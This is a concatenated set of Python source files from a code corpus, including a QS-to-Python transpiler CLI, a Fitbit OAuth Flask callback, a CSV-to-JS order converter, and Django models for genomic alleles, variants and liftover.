promote_child_if_alone = True set_child_argn = False @classmethod def tagname(self, tagname): return tagname @classmethod def can_process_tag(self, tagname): return True # ----------------- def create_xml(tagname): classobj = None for cls in xml_class_types: if cls.can_process_tag(tagname): classobj = cls break if classobj is None: return None return classobj(tagname) def parse_unknown(tagname, treedata): xmlelem = create_xml(tagname) i = 0 for k, v in treedata['content']: if type(v) is dict: instruction = parse(k, v) xmlelem.add_subelem(i, instruction) elif k in USEFUL_TOKENS: xmlelem.add_value(i, k, v) else: xmlelem.add_other(i, k, v) i += 1 return xmlelem.polish() def post_parse(treedata): source = parse("source", treedata) # print UNKNOWN_PARSERS.keys() return source.xml class Module(object): def __init__(self, name, path): self.name = name self.path = path def loadModule(self): fp = None try: description = ('.py', 'U', imp.PY_SOURCE) # description = ('.pyc', 'U', PY_COMPILED) pathname = os.path.join(self.path, self.name) fp = open(pathname) name = self.name[:self.name.find(".")] # fp, pathname, description = imp.find_module(self.name,[self.path]) self.module = imp.load_module(name, fp, pathname, description) result = True except FileNotFoundError: print("Fichero %r no encontrado" % self.name) result = False except Exception as e: print(traceback.format_exc()) result = False if fp: fp.close() return result def parseArgs(argv): parser = OptionParser() parser.add_option("-q", "--quiet", action="store_false", dest="verbose", default=True, help="don't print status messages to stdout") parser.add_option("--optdebug", action="store_true", dest="optdebug", default=False, help="debug optparse module") parser.add_option("--debug", action="store_true", dest="debug", default=False, help="prints lots of useless messages") parser.add_option("--path", dest="storepath", default=None, help="store XML results in PATH") parser.add_option("--topython", action="store_true", dest="topython", default=False, help="write python file from xml") parser.add_option("--exec-py", action="store_true", dest="exec_python", default=False, help="try to execute python file") parser.add_option("--toxml", action="store_true", dest="toxml", default=False, help="write xml file from qs") parser.add_option("--full", action="store_true", dest="full", default=False, help="write xml file from qs") parser.add_option("--cache", action="store_true", dest="cache", default=False, help="If dest file exists, don't regenerate it") (options, args) = parser.parse_args(argv) return (options, args) def main(): options, args = parseArgs(sys.argv[1:]) execute(options, args) def pythonify(filelist): options, args = parseArgs([]) options.full = True if isinstance(filelist, str): filelist = [filelist] execute(options, filelist) print(filelist) def execute(options, args): if options.optdebug: print(options, args) if options.full: execpython = options.exec_python options.exec_python = False options.full = False options.toxml = True if options.verbose: print("Pass 1 - Parse and write XML file . . .") try: execute(options, args) except Exception: print("Error parseando:") print(traceback.format_exc()) options.toxml = False options.topython = True if options.verbose: print("Pass 2 - Pythonize and write PY file . . .") try: execute(options, [arg + ".xml" for arg in args]) except Exception: print("Error convirtiendo:") print(traceback.format_exc()) if execpython: options.exec_python = execpython if options.verbose: print("Pass 3 - Test PY file load . . .") options.topython = False try: execute( options, [(arg + ".xml.py").replace(".qs.xml.py", ".qs.py") for arg in args]) except Exception: print("Error al ejecutar Python:") print(traceback.format_exc()) print("Done.") elif options.exec_python: # import qsatype for filename in args: realpath = os.path.realpath(filename) path, name = os.path.split(realpath) if not os.path.exists(realpath): print("Fichero no existe: %s" % name) continue mod = Module(name, path) if not mod.loadModule(): print("Error cargando modulo %s" % name) elif options.topython: from .pytnyzer import pythonize import io if options.cache: args = [x for x in args if not os.path.exists((x + ".py").replace(".qs.xml.py", ".qs.py")) or os.path.getmtime(x) > os.path.getctime((x + ".py").replace(".qs.xml.py", ".qs.py"))] nfs = len(args) for nf, filename in enumerate(args): bname = os.path.basename(filename) if options.storepath: destname = os.path.join(options.storepath, bname + ".py") else: destname = filename + ".py" destname = destname.replace(".qs.xml.py", ".qs.py") if not os.path.exists(filename): print("Fichero %r no encontrado" % filename) continue if options.verbose: sys.stdout.write( "Pythonizing File: %-35s . . . . (%.1f%%) \r" % (bname, 100.0 * (nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush() old_stderr = sys.stdout stream = io.StringIO() sys.stdout = stream try: pythonize(filename, destname, destname + ".debug") except Exception: print("Error al pythonificar %r:" % filename) print(traceback.format_exc()) sys.stdout = old_stderr text = stream.getvalue() if len(text) > 2: print("%s: " % bname + ("\n%s: " % bname).join(text.splitlines())) else: if options.cache: args = [x for x in args if not os.path.exists(x + ".xml") or os.path.getmtime(x) > os.path.getctime(x + ".xml")] nfs = len(args) for nf, filename in enumerate(args): bname = os.path.basename(filename) if options.verbose: sys.stdout.write( "Parsing File: %-35s . . . . (%.1f%%) " % (bname, 100.0 * (nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush() try: filecontent = open(filename, "r", encoding="latin-1").read() filecontent = flscriptparse.cleanNoPython(filecontent) except Exception as e: print("Error: No se pudo abrir fichero %-35s \n" % (repr(filename)), e) continue prog = flscriptparse.parse(filecontent) sys.stdout.write("\r") if not prog: print("Error: No se pudo abrir %-35s \n" % (repr(filename))) continue if prog["error_count"] > 0: print("Encontramos %d errores parseando: %-35s \n" % (prog["error_count"], repr(filename))) continue if not options.toxml: # Si no se quiere guardar resultado, no hace falta calcular mas continue tree_data = None try: tree_data = flscriptparse.calctree(prog, alias_mode=0) except Exception: print("Error al convertir a XML %r:" % bname) print("\n".join(traceback.format_exc().splitlines()[-7:])) if not tree_data: print("No se pudo parsear %-35s \n" % (repr(filename))) continue ast = post_parse(tree_data) if ast is None: print("No se pudo analizar %-35s \n" % (repr(filename))) continue if options.storepath: destname = os.path.join(options.storepath, bname + ".xml") else: destname = filename + ".xml" f1 = open(destname, "wb") f1.write(etree.tostring(ast, pretty_print=True)) f1.close() if __name__ == "__main__": main()
2.296875
2
src/libs/Web3Client/tests/testGetBlock.py
JorgePadilla/crabada.py
0
12796590
<gh_stars>0 from src.common.config import nodeUri from src.libs.Web3Client.AvalancheCWeb3Client import AvalancheCWeb3Client from pprint import pprint from src.libs.Web3Client.helpers.debug import pprintAttributeDict # VARS client = AvalancheCWeb3Client(nodeUri=nodeUri) # TEST FUNCTIONS def test() -> None: print(">>> LATEST BLOCK") pprintAttributeDict(client.w3.eth.get_block("latest")) print(">>> PENDING BLOCK") pprintAttributeDict(client.w3.eth.get_block("pending")) # EXECUTE test()
1.835938
2
runserver.py
pipelinedb/pipelinedht
15
12796591
#!/usr/bin/env python from argparse import ArgumentParser from dht.server import app if __name__ == '__main__': parser = ArgumentParser( description='PiplineDHT -- A simple distributed hash table') parser.add_argument('-n', '--name', action='store', required=True, help='name of node') parser.add_argument('-k', '--host', action='store', default='localhost', help='hostname to bind to') parser.add_argument('-p', '--port', action='store', type=int, required=True, help='port to bind to') args = parser.parse_args() app.run(host=args.host, port=args.port)
2.625
3
misc/ConvertOrdersCSVtoJS.py
celstark/MSTonline
1
12796592
<filename>misc/ConvertOrdersCSVtoJS.py # -*- coding: utf-8 -*- """ Created on Wed Apr 1 17:05:31 2020 @author: craig We've been using some online order files in our original PsychoPy-derived web-based MST. This converts those actual .csv files into the .js ones we'll be using here """ import os, csv, glob inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join("C:",os.sep,"Users","craig","OneDrive - University of California - Irvine","Documents","cordova_cMST","www","jsOrders") studyfiles=glob.glob(os.path.join(inpath,"MST*p1_o*csv")) testfiles=glob.glob(os.path.join(inpath,"MST*p2_o*csv")) for fname in studyfiles: print(fname) stim=[] cond=[] with open(fname,"r") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,"w") outfile.write('var trial_stim=[\n') for i in range(len(cond)): outfile.write(' {' + "stim: '{0}', cond: '{1}'".format(stim[i],cond[i]) + '}') if i < (len(cond)-1): outfile.write(',\n') else: outfile.write('\n') outfile.write(']\n') outfile.close() for fname in testfiles: print(fname) stim=[] cond=[] lbin=[] corr3=[] corr2=[] with open(fname,"r") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) lbin.append(row[2]) if row[3]=='v': corr3.append('0') corr2.append('0') elif row[3]=='b': corr3.append('1') corr2.append('2') elif row[3]=='n': corr3.append('2') corr2.append('2') else: corr3.append('-1') corr2.append('-1') infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,"w") outfile.write('var trial_stim=[\n') for i in range(len(cond)): outfile.write(' {' + "stim: '{0}', cond: '{1}', lbin: {2}, corr3: {3}, corr2: {4}".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) + '}') if i < (len(cond)-1): outfile.write(',\n') else: outfile.write('\n') outfile.write(']\n') outfile.close()
2.265625
2
poketrainer/views.py
hinnefe2/poketrainer
0
12796593
<gh_stars>0 import base64 import logging import requests from flask import redirect, render_template, request, session from requests_oauthlib import OAuth2Session from poketrainer.app import flask_app from poketrainer.api.syncs.fitbit import _generate_fitbit_token, \ FITBIT_CALLBACK_URI LOGGER = logging.getLogger(__name__) @flask_app.route('/ui/collection/') def collection(): pokemon = requests.get(request.host_url + 'api/collection').json() return render_template('collection.html', pokemon=pokemon) @flask_app.route('/ui/team/') def team(): pokemon = requests.get(request.host_url + 'api/team').json() return render_template('collection.html', pokemon=pokemon) @flask_app.route('/fitbit_login/') def fitbit_login(): return _generate_fitbit_token() @flask_app.route('/fitbitCallback') def fitbit_callback(): id_secret = (f'{flask_app.config["FITBIT_CLIENT_ID"]}:' f'{flask_app.config["FITBIT_CLIENT_SECRET"]}') # see https://dev.fitbit.com/build/reference/web-api/oauth2/#refreshing-tokens # noqa # for why we have to do this base64 stuff b64_creds = (base64.encodebytes(bytes(id_secret, 'utf8')) .decode('utf8') .rstrip()) auth_header = {'Authorization': f'Basic {b64_creds}', 'Content-Type': 'application/x-www-form-urlencoded'} post_params = {'grant_type': 'authorization_code', 'code': request.args.get('code'), 'redirect_uri': request.host_url + FITBIT_CALLBACK_URI} # request the actual access token token = requests.post('https://api.fitbit.com/oauth2/token', headers=auth_header, params=post_params).json() LOGGER.debug(token) # for some reason this fails with 'Missing access token' # c.f. https://github.com/requests/requests-oauthlib/issues/324 # oauth = OAuth2Session(client_id=flask_app.config['FITBIT_CLIENT_ID'], # redirect_uri=request.host_url + '/fitbitCallback/', # scope=['activity']) # token = oauth.fetch_token( # token_url='https://api.fitbit.com/oauth2/token', # authorization_response=request.url, # include_client_id=True, # client_secret=flask_app.config['FITBIT_CLIENT_SECRET']) session.update( FITBIT_REFRESH_TOKEN=token['refresh_token']) return redirect('/ui/collection/')
2.234375
2
snpdb/models/models_variant.py
SACGF/variantgrid
5
12796594
import collections import logging import re from typing import Optional, Pattern, Tuple, Iterable, Set import django.dispatch from django.conf import settings from django.contrib.auth.models import User from django.db import models, IntegrityError from django.db.models import Value as V, QuerySet, F from django.db.models.deletion import CASCADE, DO_NOTHING from django.db.models.fields import TextField from django.db.models.functions import Greatest from django.db.models.functions.text import Concat from django.db.models.query_utils import Q, FilteredRelation from django.dispatch import receiver from django.urls.base import reverse from django_extensions.db.models import TimeStampedModel from lazy import lazy from model_utils.managers import InheritanceManager from flags.models import FlagCollection, flag_collection_extra_info_signal, FlagInfos from flags.models.models import FlagsMixin, FlagTypeContext from library.django_utils.django_partition import RelatedModelsPartitionModel from library.genomics import format_chrom from library.utils import md5sum_str from snpdb.models import Wiki from snpdb.models.flag_types import allele_flag_types from snpdb.models.models_clingen_allele import ClinGenAllele from snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin, ProcessingStatus from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig LOCUS_PATTERN = re.compile(r"^([^:]+):(\d+)[,\s]*([GATC]+)$", re.IGNORECASE) LOCUS_NO_REF_PATTERN = r"^([^:]+):(\d+)$" VARIANT_PATTERN = re.compile(r"^([^:]+):(\d+)[,\s]*([GATC]+)>(=|[GATC]+)$", re.IGNORECASE) allele_validate_signal = django.dispatch.Signal(providing_args=["allele"]) class Allele(FlagsMixin, models.Model): """ Genome build independent - ie GRCh37 and GRCh38 variants for same change point to same allele This is generally done via ClinGen Allele Registry, but sometimes that can fail. Linked against Variant with VariantAllele below """ clingen_allele = models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE) def get_absolute_url(self): # will show allele if there is one, otherwise go to variant page return reverse('view_allele', kwargs={"pk": self.id}) def flag_type_context(self) -> FlagTypeContext: return FlagTypeContext.objects.get(pk="allele") @lazy def clingen_error(self): error = None if va := self.variantallele_set.filter(error__isnull=False).first(): error = va.error return error def variant_alleles(self): return self.variantallele_set.order_by("genome_build__name") @lazy def grch37(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False) except ValueError: return None @lazy def grch38(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False) except ValueError: return None @lazy def variants(self): return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True)) def variant_for_build(self, genome_build: GenomeBuild, best_attempt=True) -> 'Variant': vas = self.variant_alleles() va = None if genome_build: va = vas.filter(genome_build=genome_build).first() if not va and not best_attempt: raise ValueError(f'Could not find a variant in allele {self.id} for build {genome_build}') if not va: va = vas.first() if va: return va.variant raise ValueError(f'Could not find any variants in allele {self.id}') def get_liftover_variant_tuple(self, genome_build: GenomeBuild) -> Tuple[str, 'VariantCoordinate']: """ Used by to write VCF coordinates during liftover. Can be slow (API call) If you know a VariantAllele exists for your build, use variant_for_build(genome_build).as_tuple() """ from snpdb.models.models_dbsnp import DbSNP from genes.hgvs import get_hgvs_variant_tuple # Check if the other build shares existing contig genome_build_contigs = set(c.pk for c in genome_build.chrom_contig_mappings.values()) for variant_allele in self.variantallele_set.all(): if variant_allele.variant.locus.contig_id in genome_build_contigs: conversion_tool = AlleleConversionTool.SAME_CONTIG variant_tuple = variant_allele.variant.as_tuple() return conversion_tool, variant_tuple conversion_tool = None g_hgvs = None if self.clingen_allele: try: g_hgvs = self.clingen_allele.get_g_hgvs(genome_build) conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except ValueError: # Various contig errors all subclass from this pass if g_hgvs is None: if settings.LIFTOVER_DBSNP_ENABLED: va = self.variantallele_set.all().first() if va is None: raise ValueError("Allele contains no VariantAlleles at all! Cannot liftover") dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version) if dbsnp: g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt) conversion_tool = AlleleConversionTool.DBSNP variant_tuple = None if g_hgvs: variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build) return conversion_tool, variant_tuple def merge(self, conversion_tool, other_allele: "Allele") -> bool: """ Merge other_allele into this allele """ if self == other_allele: raise ValueError(f"Attempt to merge {self} to itself!") can_merge = True merge_log_message = f"{other_allele} merge into {self}" other_clingen_allele = other_allele.clingen_allele if other_clingen_allele and self.clingen_allele: can_merge = False merge_log_message = f"Error performing {merge_log_message}: both have ClinGen Alleles!" AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self, conversion_tool=conversion_tool, success=can_merge, message=merge_log_message) if can_merge: if other_clingen_allele: # Move across ClinGen Allele (may not have been possible to retrieve in all builds, but at least one # links there, and can't have another, so it'll work) other_allele.clingen_allele = None other_allele.save() self.clingen_allele = other_clingen_allele self.save() if other_fc := other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list("name", flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names = self.clinicalcontext_set.values_list("name", flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for va in other_allele.variantallele_set.all(): try: va.allele = self va.conversion_tool = conversion_tool va.save() except IntegrityError: logging.warning("VariantAllele exists with allele/build/variant of %s/%s/%s - deleting this one", va.allele, va.genome_build, va.variant) va.delete() return can_merge @property def build_names(self) -> str: return ", ".join(sorted(self.variantallele_set.values_list("genome_build__name", flat=True))) def __str__(self): name = f"Allele {self.pk}" if self.clingen_allele: name += f" ({self.clingen_allele})" return name def __format__(self, format_spec: str): if format_spec == 'CA' and (cligen_allele := self.clingen_allele): return str(cligen_allele) else: return f"Allele {self.pk}" def validate(self, liftover_complete=True): """ :param liftover_complete: If False does not check for missing representations """ if liftover_complete: v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if v37: self.close_open_flags_of_type(allele_flag_types.missing_37) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True) if v38: self.close_open_flags_of_type(allele_flag_types.missing_38) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True) allele_validate_signal.send(sender=Allele, allele=self) @receiver(flag_collection_extra_info_signal, sender=FlagCollection) def get_extra_info(flag_infos: FlagInfos, user: User, **kwargs): # pylint: disable=unused-argument alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids) allele: Allele for allele in alleles: flag_infos.set_extra_info(allele.flag_collection_id, { 'label': f'Allele {allele.id}' }, source_object=allele) class AlleleMergeLog(TimeStampedModel): """ Keep track of calls to Allele.merge() """ old_allele = models.ForeignKey(Allele, related_name="old_allele_merge", on_delete=CASCADE) new_allele = models.ForeignKey(Allele, related_name="new_allele_merge", on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) success = models.BooleanField(default=True) message = models.TextField(null=True) VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom pos ref alt') class Sequence(models.Model): """ We want to guarantee seq is unique (so Locus/Variant can have unique constraints) Postgres by default uses indexes for constraints, and large TextFields give error of: "index row requires x bytes, maximum size is 8191" The easiest solution is to md5sum seq and make the constraint on that. Another possible solution is to use Gist indexes but that requires installing the btree_gist extension (requires postgres Admin rights). Django 3 has ExclusionConstraint, Postgres contrib has BtreeGistExtension to add via migration """ seq = models.TextField() seq_md5_hash = models.CharField(max_length=32, unique=True) length = models.IntegerField() def save(self, force_insert=False, force_update=False, using=None, update_fields=None): if not self.seq_md5_hash: self.seq_md5_hash = md5sum_str(self.seq) super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields) @staticmethod def abbreviate(s: str, max_length: int = 20): if len(s) > max_length: s = f"{s[:3]}...{s[-3:]}" return s def __str__(self): return self.abbreviate(self.seq) @staticmethod def get_pk_by_seq(q=None): qs = Sequence.objects.all() if q: qs = qs.filter(q) return dict(qs.values_list("seq", "pk")) def is_standard_sequence(self): """ only contains G/A/T/C/N """ return not re.match(r"[^GATCN]", self.seq) class Locus(models.Model): """ 1 per line in a VCF file (multiple Variants with different alt alleles point to the same locus) There is only 1 Locus for a given chrom/position/ref per database (handled via insertion queues) """ contig = models.ForeignKey(Contig, on_delete=CASCADE) position = models.IntegerField(db_index=True) ref = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = ("contig", "position", "ref") @property def chrom(self): return self.contig.name def __str__(self): return f"{self.chrom}:{self.position} {self.ref}" class Variant(models.Model): """ Variants represent the different alleles at a locus Usually 2+ per line in a VCF file (ref + >= 1 alts pointing to the same locus for the row) There is only 1 Variant for a given locus/alt per database (handled via insertion queues) """ REFERENCE_ALT = "=" locus = models.ForeignKey(Locus, on_delete=CASCADE) alt = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = ("locus", "alt") @staticmethod def get_chrom_q(chrom): return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod def get_contigs_q(genome_build: GenomeBuild): """ Restrict to contigs in a genome build """ return Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod def get_no_reference_q(): return ~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod def get_overlap_annotate_and_q(contig, start, end): """ Query handling indels. Contigs must match and variant.start <= end AND variant.end_position >= start """ annotation_kwargs = {"longest_sequence": Greatest("locus__ref__length", "alt__length"), "end_position": F("locus__position") + F("longest_sequence")} q = Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start) return annotation_kwargs, q @staticmethod def annotate_variant_string(qs, name="variant_string", path_to_variant=""): """ Return a "1:123321 G>C" style string in a query """ kwargs = {name: Concat(f"{path_to_variant}locus__contig__name", V(":"), f"{path_to_variant}locus__position", V(" "), f"{path_to_variant}locus__ref__seq", V(">"), f"{path_to_variant}alt__seq", output_field=TextField())} return qs.annotate(**kwargs) @staticmethod def format_tuple(chrom, position, ref, alt, abbreviate=False) -> str: if abbreviate: ref = Sequence.abbreviate(ref) alt = Sequence.abbreviate(alt) return f"{chrom}:{position} {ref}>{alt}" @staticmethod def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern: Pattern[str] = VARIANT_PATTERN) -> VariantCoordinate: """ regex_pattern - has to have 4 groups, returns (chrom, position, ref, alt) """ variant_tuple = None if m := regex_pattern.match(variant_string): chrom, position, ref, alt = m.groups() chrom, position, ref, alt = Variant.clean_variant_fields(chrom, position, ref, alt, want_chr=genome_build.reference_fasta_has_chr) contig = genome_build.chrom_contig_mappings[chrom] variant_tuple = VariantCoordinate(contig.name, int(position), ref, alt) return variant_tuple @staticmethod def get_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern=VARIANT_PATTERN) -> Optional['Variant']: variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern) try: return Variant.get_from_tuple(variant_tuple, genome_build) except Variant.DoesNotExist: return None @staticmethod def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) -> 'Variant': params = ["locus__contig__name", "locus__position", "locus__ref__seq", "alt__seq"] return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build, **dict(zip(params, variant_tuple))) @lazy def genome_builds(self) -> Set['GenomeBuild']: gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(), contig__locus__variant=self) return {gbc.genome_build for gbc in gbc_qs} @lazy def coordinate(self) -> VariantCoordinate: locus = self.locus contig = locus.contig return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq) @staticmethod def is_ref_alt_reference(ref, alt): return ref == alt or alt == '.' @property def is_reference(self) -> bool: return self.alt.seq == self.REFERENCE_ALT @property def is_standard_variant(self) -> bool: """ Variant alt sequence is standard [GATCN] (ie not special or reference) """ # locus.ref should always be standard... return self.alt.is_standard_sequence() @property def is_indel(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length != self.alt.length @property def is_insertion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length @property def is_deletion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length > self.alt.length @property def can_have_clingen_allele(self) -> bool: return self.is_standard_variant or self.is_reference @property def can_have_annotation(self) -> bool: return self.is_standard_variant def as_tuple(self) -> VariantCoordinate: return self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq def is_abbreviated(self): return str(self) != self.full_string @lazy def full_string(self): """ No abbreviation """ return self.format_tuple(*self.as_tuple()) def __str__(self): return self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref, self.alt) def get_absolute_url(self): # will show allele if there is one, otherwise go to variant page return reverse('view_allele_from_variant', kwargs={"variant_id": self.pk}) @lazy def allele(self) -> Optional[Allele]: va = VariantAllele.objects.filter(variant=self).first() if va: return va.allele return None @property def equivalent_variants(self) -> Iterable['Variant']: allele = self.allele if not allele: return [self] return Variant.objects.filter(variantallele__allele=allele) def get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first() def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version if can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first(): return can if version := self.varianttranscriptannotation_set.filter(version=vav).first(): return version if any_at_all := self.varianttranscriptannotation_set.first(): return any_at_all def get_canonical_c_hgvs(self, genome_build): c_hgvs = None if cta := self.get_canonical_transcript_annotation(genome_build): c_hgvs = cta.hgvs_c return c_hgvs @property def start(self): return self.locus.position @property def end(self): return self.locus.position + max(self.locus.ref.length, self.alt.length) @staticmethod def clean_variant_fields(chrom, position, ref, alt, want_chr): ref = ref.strip().upper() alt = alt.strip().upper() if Variant.is_ref_alt_reference(ref, alt): alt = Variant.REFERENCE_ALT chrom = format_chrom(chrom, want_chr) return chrom, position, ref, alt class VariantWiki(Wiki): variant = models.OneToOneField(Variant, on_delete=CASCADE) class VariantAllele(TimeStampedModel): """ It's possible for multiple variants from the same genome build to resolve to the same allele (due to our normalization not being the same as ClinGen or 2 loci in a genome build being represented by 1 loci in the build being used by ClinGen) - but it's not likely. It's a bug to have the same 3 variant/build/allele so we can add that unique_together constraint We only expect to store Alleles for a small fraction of Variants So don't want them on the Variant object - instead do 1-to-1 """ # Some builds share contigs (eg GRCh37/38 share MT and some unplaced scaffolds) - in those cases # we'll have the same variant linked through different VariantAlleles (so it can't be 1-to-1) variant = models.ForeignKey(Variant, on_delete=CASCADE) genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) origin = models.CharField(max_length=1, choices=AlleleOrigin.choices) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) error = models.JSONField(null=True) # Only set on error class Meta: unique_together = ("variant", "genome_build", "allele") @property def canonical_c_hgvs(self): return self.variant.get_canonical_c_hgvs(self.genome_build) def needs_clingen_call(self): if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is None: if self.error: # Retry if server was down return self.error.get("errorType") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE return True return False def __str__(self): return f"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})" class VariantCollection(RelatedModelsPartitionModel): """ A set of variants - usually used as a cached result """ RECORDS_BASE_TABLE_NAMES = ["snpdb_variantcollectionrecord"] RECORDS_FK_FIELD_TO_THIS_MODEL = "variant_collection_id" PARTITION_LABEL_TEXT = "variant_collection" name = models.TextField(null=True) count = models.IntegerField(null=True) status = models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED) @property def variant_collection_alias(self): return f"variantcollection_{self.pk}" def get_annotation_kwargs(self): vcr_condition = Q(variantcollectionrecord__variant_collection=self) return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)} def get_q(self): if self.status != ProcessingStatus.SUCCESS: raise ValueError(f"{self}: status {self.get_status_display()} != SUCCESS") return Q(**{f"{self.variant_collection_alias}__isnull": False}) def __str__(self): return f"VariantCollection: {self.pk} ({self.name})" class VariantCollectionRecord(models.Model): variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled via drop partition variant = models.ForeignKey(Variant, on_delete=CASCADE) class AlleleSource(models.Model): """ Provides a source of alleles for liftover pipelines. """ objects = InheritanceManager() def get_genome_build(self): return None def get_variants_qs(self): return Variant.objects.none() def get_allele_qs(self): return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def liftover_complete(self, genome_build: GenomeBuild): """ This is called at the end of a liftover pipeline (once per build) """ pass class VariantAlleleSource(AlleleSource): variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) def get_genome_build(self): return self.variant_allele.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele=self.variant_allele) @staticmethod def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']: """ Only works if liftover was done via VariantAlleleSource """ allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele) return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first() class VariantAlleleCollectionSource(AlleleSource): genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) def get_genome_build(self): return self.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def get_variant_allele_ids(self): return self.variantallelecollectionrecord_set.values_list("variant_allele", flat=True) class VariantAlleleCollectionRecord(models.Model): collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE) variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) class Liftover(TimeStampedModel): """ Liftover pipeline involves reading through a VCF where ID is set to Allele.pk and then creating VariantAllele entries for the variant/allele Some AlleleConversionTools (eg ClinGen AlleleRegistry) we can write the VCF in the desired genome build For others (NCBI Remap) we need to write the source genome build VCF first Alleles must have already been created - allele_source used to retrieve them The VCF (in genome_build build) is set in UploadedFile for the UploadPipeline """ user = models.ForeignKey(User, on_delete=CASCADE) allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) source_vcf = models.TextField(null=True) source_genome_build = models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE, related_name="liftover_source_genome_build") genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) # destination def get_allele_source(self) -> AlleleSource: """ Returns subclass instance """ return AlleleSource.objects.get_subclass(pk=self.allele_source_id) def get_allele_qs(self) -> QuerySet: return self.get_allele_source().get_allele_qs() def complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build) def __str__(self): source = "" if self.source_genome_build: source = f"from {self.source_genome_build.name} " return f"Liftover {source}to {self.genome_build} via {self.get_conversion_tool_display()}" class LiftoverError(models.Model): liftover = models.ForeignKey(Liftover, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) variant = models.ForeignKey(Variant, null=True, on_delete=CASCADE) # 